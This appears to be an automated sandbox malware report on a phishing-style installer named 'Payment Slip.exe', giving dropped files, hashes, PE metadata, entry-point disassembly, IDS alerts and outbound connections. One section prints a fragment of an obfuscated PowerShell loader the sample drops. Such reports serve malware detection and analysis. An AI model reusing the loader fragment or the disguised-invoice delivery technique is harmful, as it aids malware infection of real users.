                                            Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                            Category:dropped
                                            Size (bytes):874096
                                            Entropy (8bit):7.618941362093886
                                            Encrypted:false
                                            SSDEEP:12288:Qt7ExDo//OtX1lxawkeVCGmQzVuoLZJBduEeelp6ai9QahX/tqRcTAcifEMXGwOF:cYDoeMwkejuoLDLXkaSQaBtXEQEjEfh
                                            MD5:DB9B31DA65D0EF913176D54CEB4CF5F4
                                            SHA1:5878F8C4E6B82EF6C9D32C020BB9D5898E973E96
                                            SHA-256:893B893178434A4273089C619B1ACAEFAB661C6D647D832A6375FB53E2753669
                                            SHA-512:703BC36BF7005A0AD315D734D67D304E07303D804858C4BDF43433732E15517C41BDF26DBC58E0A739B08C8E3C084CE09E61254EBCE6C4F40B10791A290529C4
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 32%
                                            Reputation:low
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.*ju.*ju.*j..ujw.*ju.+j..*j..wjd.*j!..j..*j..,jt.*jRichu.*j........PE..L....f.R.................`...*......X3.......p....@..................................1.......................................t...........Y...........>...............................................................p...............................text...f^.......`.................. ..`.rdata..T....p.......d..............@..@.data................x..............@....ndata...................................rsrc....Y.......Z...~..............@..@................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):26
                                            Entropy (8bit):3.95006375643621
                                            Encrypted:false
                                            SSDEEP:3:ggPYV:rPYV
                                            MD5:187F488E27DB4AF347237FE461A079AD
                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                            Malicious:true
                                            Reputation:high, very likely benign file
                                            Preview:[ZoneTransfer]....ZoneId=0
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Reputation:high, very likely benign file
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Reputation:high, very likely benign file
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Users\user\Desktop\Payment Slip.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):351899
                                            Entropy (8bit):7.617857096837891
                                            Encrypted:false
                                            SSDEEP:6144:shXCYx099Hxs5P9wJsDSJyc/5g34wYuFh8TbjNjnHMp8c7GW0NyU:shXCp9RmP9AsDE/5g38uFhEbj28yU
                                            MD5:F8435A0869A068FBFDEEB94CD74F40B0
                                            SHA1:AB56FCE05AB0038D7420A19795F3631EDF9D7943
                                            SHA-256:747415DC76E298B9AB61608E415000772F0B9FB10FC98AF8F2D9391B9D08AD8E
                                            SHA-512:7E2C8669A3D62E5B9196CB66CD4C59CC29877DE0632F3BC36797EA755672F05F235590222C5506C7CB0FE2042D139D42F4BB26497467DE8E2F3D72F923FBE6C7
                                            Malicious:false
                                            Preview:......................kk......cc.##..e.G....8.uuu..>........N......D.t........;..$.+.....w.......4...&........................mm.........'.......................jj.........dd............9999..............==........\.............E....LL.............BBBB.....N.................................................}...........$$$$............................E........ttttt...)))............//....H..uu......................*.........kkkk.............?.....mmm..~..........}........................*..K.........................00..////.....G...................]..+...........P.bbbb..."......................&..[..................xx................nnn...........................g.ggggg..........[.2........c.....**...............................s........BB....../...dd.......{.............BBB........................................P.....I...............q.d.U.Q........<..;;......>..................(.................zz.....~.....;.............................................e...............UUUUUU..cc.U.....
                                            Process:C:\Users\user\Desktop\Payment Slip.exe
                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                            Category:dropped
                                            Size (bytes):71333
                                            Entropy (8bit):5.183364102049008
                                            Encrypted:false
                                            SSDEEP:1536:uQtOY0eXpfTsEr/aTT50Ewm+VF95VMJ6X3i+F+ElmBXWBkWQncphT:uQtOY0eXpfrrC50E1uL5VMJ6Cn/Okyn
                                            MD5:5F8EB18EF6FCE8E3FC026B2F93007A65
                                            SHA1:D5BB91CD2806BE9B97218CBBE24C5D04A211CC17
                                            SHA-256:AC3795FD2314BB76E57E50C7FDE085630BD9DDD66698E8870535962A368C72B5
                                            SHA-512:EDF1207FEEEE29868459018BCFAABA67E3891BCBC0716F040F9DA2748FD4AAB26E795E0BF3A5EE2C5B4FCC79FC1F0CBFE89CA9C4B9D79393E61881A54512AB36
                                            Malicious:true
                                            Preview:$Preopinionated=$Politimssigizzarro;<#Storbritanniens Ramponerede Porphyrization adhibits Choise #><#Synapticulate Sandaliform Whiglet Snickdrawing Annelieses ekacaesium #><#Korna Oka Unhaziness #><#Blunderer Illegitimatise Helvetii Trffende lagringspriser #><#Unsulliable Martyrologistic Janett Chromophotolithograph #><#Estramazone Straksfradragene belie Kobberstik Sejlbrtter Reshaper Myldrets #>$Kppenes = " In.tra;Smother`$ erhv rNextradioTrusteen To.stir Fas.ioe InoculcFarupudoPerver,r HviidsdStreptoiBefolknn Eftermg maste,=Skiltef`$uvedk.mDSlutlinu Ef erdsBowbentt UbestabFakkeleiDagtimen Amt.ra;OmorganFParatyfuGeopolinSalicylc HeroditD skussiGo.fieroSvmmefonKneadab AnmeldeMSrtryksi ReefabsUkorrekc etransapr,longsHomotaxtUndr adeMi rencd Nedton8Phyllou5ru,icon En.chun(Holobla`$PrinciplSvaleroeServicevCompletiStjgrnstTibeta.iTroljercDepotinire lektsRack,timP.ocell,Fangele uncynic`$ TyvestRStykkeverekap.tcSammenhl Brikvva qualmisForsigtsSygn.reiAn,trgef EmbedsicadwallcChironoaNationat
                                            Process:C:\Users\user\Desktop\Payment Slip.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):629448
                                            Entropy (8bit):1.257234589035216
                                            Encrypted:false
                                            SSDEEP:1536:LD3CLXCvTm3+3JOgkFWZfcDkZLwWIE4pzswWg95LDsRgtlVkIRh:X3US6uZOgk2fcJl5FWy5LDEQlK0
                                            MD5:B9E5947712FA407B58A8527B52CE050E
                                            SHA1:9FD16F2F3569FF478C591E16A03EF65F7D63E57E
                                            SHA-256:30B60EB19A5E7A32DAB61A17C1BCA485D8040EE9488024AA031C0190A7DCB510
                                            SHA-512:BBCF1AC518547982928276E01EA61C26600A426EBD57928A82801F5ACBD8E2047359AC1CB41DEB0898CFB5D10BAA419C782C910830517C3F44F555963D6EEB9D
                                            Malicious:false
                                            Preview:....,......................................................................k............\..................................J.................................................}.......................R....................... ........k...........$.....................................................'............ ...............................I....................2................=.................................................................................................................d.................................................................g..............................................X.....................j............................................................................4....mJ..T...Z......................... ..................Y......Z.......................................U.............L....u..S......................................................U.................................U..................................................e.........................
                                            Process:C:\Users\user\Desktop\Payment Slip.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):221081
                                            Entropy (8bit):1.2406328235167285
                                            Encrypted:false
                                            SSDEEP:768:+sNmrp+QYzgwtqzOh8mcMPPy14oMvFzm8w/Y8vnLXWY8UBiBXVO3FzxrFUHItn4x:Y9A/S50ytu8voKwH
                                            MD5:D0A61E12A7A27A4B719AB0C4B9F57B88
                                            SHA1:55A349C760BA7AF05C54934924E2C0289BB3FF24
                                            SHA-256:243221C7BE40D55E82FDF162332959F85DF94CAF3EC8BC550EEE0DE0FC814A64
                                            SHA-512:3F117A4C26DDC7200AF9A79E8965F4396D175B368FF372BC7210929B15BA43B56EF68C6870F914638EC49ADF18CB553DF4492F583485ECC954C0238CC1405670
                                            Malicious:false
                                            Preview:.....................I...............................................\..................................Y.............................^...............................................................=..........e........................C....P................................`...............-.........................'.........................................................M.........................D....................[@..........................................H..........A...........................................d.........Lk.........................H.......n..............................................................................................C.........................4...v........................JU........&..................................................................]..... ....................................N..............................'.............................^.........................................................................k...............*...............
                                            Process:C:\Users\user\Desktop\Payment Slip.exe
                                            File Type:ASCII text, with very long lines (367), with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):440
                                            Entropy (8bit):4.2802377004664205
                                            Encrypted:false
                                            SSDEEP:12:QEUc9mHApTzMcC94e7q6hDwyK2Xkj9rKZaq:l9JTMp7AyKykBrk
                                            MD5:9524154CFD936F21394F74D000856732
                                            SHA1:3A45FE1B1EAAE9A1CAF11CA59FEBA1B3DE8E0CA3
                                            SHA-256:8EE6AE6BD6F5AF379B359A0CDD7721AEAEE0989C4B61431F2EAB1240FBBA56A2
                                            SHA-512:4DA2F73D1D6F027B9C939785F63D6F75477F978AB7F8532D8395D5C5C346397E1E4B090CC815AA5F75E2629F81C1FD64B7246266331DBB26D3B0075CE4579250
                                            Malicious:false
                                            Preview:habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious deklinationen armiferous bryggerkar totaktsmotorernes ombudsmandsudtalelsers overtinsel metronidazole uldspind..unmortifiedness ildspaasttelserne plagiostomata klauss ryaerne carline,
                                            Process:C:\Users\user\Desktop\Payment Slip.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):1283861
                                            Entropy (8bit):3.9234305452380744
                                            Encrypted:false
                                            SSDEEP:12288:MhXCp9RmP9AsDE/5g38uFhEbj28yuoSV/8Qjk5Cact5v:M9QkAsY/+jhZ82S2Ek4v
                                            MD5:981FB438C385528AA68E93252C8E410C
                                            SHA1:24B18B7E3E2CFBEE8C8790D950570DD420217654
                                            SHA-256:A85235CDD2E9FC521C9E340DB3D024E08AC62E02AC875364889186CB6C935D2B
                                            SHA-512:F3665F8F34D20D28584866B94A37D9D0A2B43CD629202E9BACD08B47F06E752BF8C3EAC3ABA4322504E042C0BAC456DA34B9052E88765F77DD3B8C55E1F87F7C
                                            Malicious:false
                                            Preview:.%......,...................T............$.......%........................................................................................................................................................................................................................................G...f...............j...............................................................................................................................v...............3.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                            Entropy (8bit):7.618941362093886
                                            TrID:
                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                            • DOS Executable Generic (2002/1) 0.02%
                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                            File name:Payment Slip.exe
                                            File size:874'096 bytes
                                            MD5:db9b31da65d0ef913176d54ceb4cf5f4
                                            SHA1:5878f8c4e6b82ef6c9d32c020bb9d5898e973e96
                                            SHA256:893b893178434a4273089c619b1acaefab661c6d647d832a6375fb53e2753669
                                            SHA512:703bc36bf7005a0ad315d734d67d304e07303d804858c4bdf43433732e15517c41bdf26dbc58e0a739b08c8e3c084ce09e61254ebce6c4f40b10791a290529c4
                                            SSDEEP:12288:Qt7ExDo//OtX1lxawkeVCGmQzVuoLZJBduEeelp6ai9QahX/tqRcTAcifEMXGwOF:cYDoeMwkejuoLDLXkaSQaBtXEQEjEfh
                                            TLSH:510502413292ED50D8150D741507C7858FB29E202E56EAC73B58B7AFDE3BBC27B0A297
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.*ju.*ju.*j..ujw.*ju.+j..*j..wjd.*j!..j..*j..,jt.*jRichu.*j........PE..L....f.R.................`...*......X3.......p....@
                                            Icon Hash:293cc0c898b02800
                                            Entrypoint:0x403358
                                            Entrypoint Section:.text
                                            Digitally signed:true
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                            DLL Characteristics:TERMINAL_SERVER_AWARE
                                            Time Stamp:0x52BA66B2 [Wed Dec 25 05:01:38 2013 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:e221f4f7d36469d53810a4b5f9fc8966
                                            Signature Valid:false
                                            Signature Issuer:CN="Underarmes Atrofisk possession ", O=fljdres, L=Freden (Leine), S=Niedersachsen, C=DE
                                            Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                            Error Number:-2146762487
                                            Not Before, Not After
                                            • 11/05/2024 09:21:13 11/05/2027 09:21:13
                                            Subject Chain
                                            • CN="Underarmes Atrofisk possession ", O=fljdres, L=Freden (Leine), S=Niedersachsen, C=DE
                                            Version:3
                                            Thumbprint MD5:447DE2E793AC09ED6F34F16F8FF6FF3B
                                            Thumbprint SHA-1:36F3A06EAC92D37CEF32F71A8D8796440F26E182
                                            Thumbprint SHA-256:7B2EE0A9A807A3ED368453AF59015BADC1FF44463A11C28681792AB96FEB327B
                                            Serial:6686AA04A4D236B2441A3657CF74A296E9F43E65
                                            Instruction
                                            sub esp, 000002D4h
                                            push ebx
                                            push ebp
                                            push esi
                                            push edi
                                            push 00000020h
                                            xor ebp, ebp
                                            pop esi
                                            mov dword ptr [esp+14h], ebp
                                            mov dword ptr [esp+10h], 00409230h
                                            mov dword ptr [esp+1Ch], ebp
                                            call dword ptr [00407034h]
                                            push 00008001h
                                            call dword ptr [004070BCh]
                                            push ebp
                                            call dword ptr [004072ACh]
                                            push 00000008h
                                            mov dword ptr [00429298h], eax
                                            call 00007FD52D0F26ECh
                                            mov dword ptr [004291E4h], eax
                                            push ebp
                                            lea eax, dword ptr [esp+34h]
                                            push 000002B4h
                                            push eax
                                            push ebp
                                            push 00420690h
                                            call dword ptr [0040717Ch]
                                            push 0040937Ch
                                            push 004281E0h
                                            call 00007FD52D0F2357h
                                            call dword ptr [00407134h]
                                            mov ebx, 00434000h
                                            push eax
                                            push ebx
                                            call 00007FD52D0F2345h
                                            push ebp
                                            call dword ptr [0040710Ch]
                                            cmp word ptr [00434000h], 0022h
                                            mov dword ptr [004291E0h], eax
                                            mov eax, ebx
                                            jne 00007FD52D0EF83Ah
                                            push 00000022h
                                            mov eax, 00434002h
                                            pop esi
                                            push esi
                                            push eax
                                            call 00007FD52D0F1D96h
                                            push eax
                                            call dword ptr [00407240h]
                                            mov dword ptr [esp+18h], eax
                                            jmp 00007FD52D0EF8FEh
                                            push 00000020h
                                            pop edx
                                            cmp cx, dx
                                            jne 00007FD52D0EF839h
                                            inc eax
                                            inc eax
                                            cmp word ptr [eax], dx
                                            je 00007FD52D0EF82Bh
                                            add word ptr [eax], 0000h
                                            Programming Language:
                                            • [EXP] VC++ 6.0 SP5 build 8804
                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x74940xb4.rdata
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x480000x55918.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0xd3ea00x17d0
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x70000x2b8.rdata
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x10000x5e660x6000e8f12472e91b02deb619070e6ee7f1f4False0.6566569010416666data6.419409887460116IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                            .rdata0x70000x13540x14002222fe44ebbadbc32af32dfc9c88e48eFalse0.4306640625data5.037511188789184IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .data0x90000x202d80x600a5ec1b720d350c6303a7aba8d85072bfFalse0.4733072916666667data3.7600484096214832IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                            .ndata0x2a0000x1e0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                            .rsrc0x480000x559180x55a003d6a8b72f49b497aa2f6e828f36e2071False0.6818487682481752data6.750089044557724IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                            RT_ICON0x486e80x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.48516798769667574
                                            RT_ICON0x58f100x104d3PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0004043671653862
                                            RT_ICON0x693e80x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States0.5461162497372294
                                            RT_ICON0x728900x6b94PNG image data, 256 x 256, 8-bit colormap, non-interlacedEnglishUnited States0.995279593318809
                                            RT_ICON0x794280x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States0.5835951940850277
                                            RT_ICON0x7e8b00x4c28Device independent bitmap graphic, 128 x 256 x 8, image size 16384EnglishUnited States0.46250512925728354
                                            RT_ICON0x834d80x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.5978979688238073
                                            RT_ICON0x877000x2d6fPNG image data, 256 x 256, 8-bit colormap, non-interlacedEnglishUnited States0.9944114865445791
                                            RT_ICON0x8a4700x2ca8Device independent bitmap graphic, 96 x 192 x 8, image size 9216EnglishUnited States0.5530090972708187
                                            RT_ICON0x8d1180x2868Device independent bitmap graphic, 128 x 256 x 4, image size 8192EnglishUnited States0.31254833720030933
                                            RT_ICON0x8f9800x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.6519709543568465
                                            RT_ICON0x91f280x1bc8Device independent bitmap graphic, 72 x 144 x 8, image size 5184EnglishUnited States0.6259842519685039
                                            RT_ICON0x93af00x16e8Device independent bitmap graphic, 96 x 192 x 4, image size 4608EnglishUnited States0.3922237380627558
                                            RT_ICON0x951d80x1628Device independent bitmap graphic, 64 x 128 x 8, image size 4096EnglishUnited States0.68688293370945
                                            RT_ICON0x968000x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.7211538461538461
                                            RT_ICON0x978a80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304EnglishUnited States0.7316098081023454
                                            RT_ICON0x987500xde8Device independent bitmap graphic, 72 x 144 x 4, image size 2592EnglishUnited States0.4393258426966292
                                            RT_ICON0x995380xa68Device independent bitmap graphic, 64 x 128 x 4, image size 2048EnglishUnited States0.5041291291291291
                                            RT_ICON0x99fa00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.7872950819672131
                                            RT_ICON0x9a9280x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024EnglishUnited States0.8375451263537906
                                            RT_ICON0x9b1d00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576EnglishUnited States0.875
                                            RT_ICON0x9b8980x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.5682926829268292
                                            RT_ICON0x9bf000x568Device independent bitmap graphic, 16 x 32 x 8, image size 256EnglishUnited States0.7890173410404624
                                            RT_ICON0x9c4680x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.8625886524822695
                                            RT_ICON0x9c8d00x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.7204301075268817
                                            RT_ICON0x9cbb80x1e8Device independent bitmap graphic, 24 x 48 x 4, image size 288EnglishUnited States0.805327868852459
                                            RT_ICON0x9cda00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.8040540540540541
                                            RT_DIALOG0x9cec80x120dataEnglishUnited States0.5138888888888888
                                            RT_DIALOG0x9cfe80x11cdataEnglishUnited States0.6056338028169014
                                            RT_DIALOG0x9d1080xc4dataEnglishUnited States0.5918367346938775
                                            RT_DIALOG0x9d1d00x60dataEnglishUnited States0.7291666666666666
                                            RT_GROUP_ICON0x9d2300x180Targa image data - Map 32 x 1235 x 1 +1EnglishUnited States0.5442708333333334
                                            RT_VERSION0x9d3b00x260dataEnglishUnited States0.5263157894736842
                                            RT_MANIFEST0x9d6100x305XML 1.0 document, ASCII text, with very long lines (773), with no line terminatorsEnglishUnited States0.5614489003880984
                                            DLLImport
                                            KERNEL32.dllCompareFileTime, SearchPathW, SetFileTime, CloseHandle, GetShortPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, GetFullPathNameW, CreateDirectoryW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, SetFileAttributesW, ExpandEnvironmentStringsW, SetErrorMode, LoadLibraryW, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, lstrcpyA, lstrcpyW, lstrcatW, GetSystemDirectoryW, GetVersion, GetProcAddress, LoadLibraryA, GetModuleHandleA, GetModuleHandleW, lstrcmpiW, lstrcmpW, WaitForSingleObject, GlobalFree, GlobalAlloc, LoadLibraryExW, GetExitCodeProcess, FreeLibrary, WritePrivateProfileStringW, GetCommandLineW, GetTempPathW, GetPrivateProfileStringW, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, WriteFile, lstrlenA, WideCharToMultiByte
                                            USER32.dllEndDialog, ScreenToClient, GetWindowRect, RegisterClassW, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, wsprintfW, CreateWindowExW, SystemParametersInfoW, AppendMenuW, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, GetDC, SetWindowLongW, LoadImageW, SendMessageTimeoutW, FindWindowExW, EmptyClipboard, OpenClipboard, TrackPopupMenu, EndPaint, ShowWindow, GetDlgItem, IsWindow, SetForegroundWindow
                                            GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                            SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
                                            ADVAPI32.dllRegCloseKey, RegOpenKeyExW, RegDeleteKeyW, RegDeleteValueW, RegEnumValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                            COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                            ole32.dllCoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
                                            VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
                                            Language of compilation systemCountry where language is spokenMap
                                            EnglishUnited States
                                            TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                                            2024-07-25T10:05:32.773119+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH4971980192.168.2.5193.122.6.168
                                            2024-07-25T10:04:28.575054+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434970620.12.23.50192.168.2.5
                                            2024-07-25T10:05:06.827230+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434971420.12.23.50192.168.2.5
                                            2024-07-25T10:05:23.882523+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH4971680192.168.2.5193.122.6.168
                                            2024-07-25T10:05:24.468328+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H49718443192.168.2.5188.114.97.3
                                            2024-07-25T10:05:21.569955+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH4971680192.168.2.5193.122.6.168
                                            2024-07-25T10:05:10.710092+0200TCP2803270ETPRO MALWARE Common Downloader Header Pattern UHCa49715443192.168.2.5108.167.181.251
                                            2024-07-25T10:06:02.130852+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H49732443192.168.2.5188.114.97.3
                                            TimestampSource PortDest PortSource IPDest IP
                                            Jul 25, 2024 10:05:09.999167919 CEST49715443192.168.2.5108.167.181.251
                                            Jul 25, 2024 10:05:09.999207020 CEST44349715108.167.181.251192.168.2.5
                                            Jul 25, 2024 10:05:09.999356031 CEST49715443192.168.2.5108.167.181.251
                                            Jul 25, 2024 10:05:10.015091896 CEST49715443192.168.2.5108.167.181.251
                                            Jul 25, 2024 10:05:10.015104055 CEST44349715108.167.181.251192.168.2.5
                                            Jul 25, 2024 10:05:10.511921883 CEST44349715108.167.181.251192.168.2.5
                                            Jul 25, 2024 10:05:10.512032032 CEST49715443192.168.2.5108.167.181.251
                                            Jul 25, 2024 10:05:10.574161053 CEST49715443192.168.2.5108.167.181.251
                                            Jul 25, 2024 10:05:10.574174881 CEST44349715108.167.181.251192.168.2.5
                                            Jul 25, 2024 10:05:10.574462891 CEST44349715108.167.181.251192.168.2.5
                                            Jul 25, 2024 10:05:10.574529886 CEST49715443192.168.2.5108.167.181.251
                                            Jul 25, 2024 10:05:10.593935966 CEST49715443192.168.2.5108.167.181.251
                                            Jul 25, 2024 10:05:10.636497021 CEST44349715108.167.181.251192.168.2.5
                                            Jul 25, 2024 10:05:10.710103035 CEST44349715108.167.181.251192.168.2.5
                                            Jul 25, 2024 10:05:10.710133076 CEST44349715108.167.181.251192.168.2.5
                                            Jul 25, 2024 10:05:10.710308075 CEST49715443192.168.2.5108.167.181.251
                                            Jul 25, 2024 10:05:10.710316896 CEST44349715108.167.181.251192.168.2.5
                                            Jul 25, 2024 10:05:10.710437059 CEST49715443192.168.2.5108.167.181.251
